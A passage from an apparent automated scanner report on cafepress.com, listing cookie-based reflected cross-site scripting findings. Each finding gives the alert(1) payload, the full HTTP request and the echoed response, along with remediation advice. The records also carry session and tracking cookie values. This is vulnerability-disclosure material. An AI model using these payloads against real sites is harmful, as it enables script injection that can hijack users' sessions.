GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 55553 Date: Sun, 26 Dec 2010 13:47:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55553 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/holiday-invitations
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c12</script><script>alert(1)</script>767fea4e030 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=22c12</script><script>alert(1)</script>767fea4e030 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 55575 Date: Sun, 26 Dec 2010 13:47:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55575 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '22c12</script><script>alert(1)</script>767fea4e030 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/holiday-photo-cards
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744de"-alert(1)-"d438f72d6bc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 58754 Date: Sun, 26 Dec 2010 13:47:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/holiday-photo-cards
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf95</script><script>alert(1)</script>565909414f4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=acf95</script><script>alert(1)</script>565909414f4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 58776 Date: Sun, 26 Dec 2010 13:47:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58776 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'acf95</script><script>alert(1)</script>565909414f4 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-gifts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c29af"-alert(1)-"a5c8b14505 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 71897 Date: Sun, 26 Dec 2010 13:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-gifts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73b12</script><script>alert(1)</script>ef50e1d8ced was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=73b12</script><script>alert(1)</script>ef50e1d8ced ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
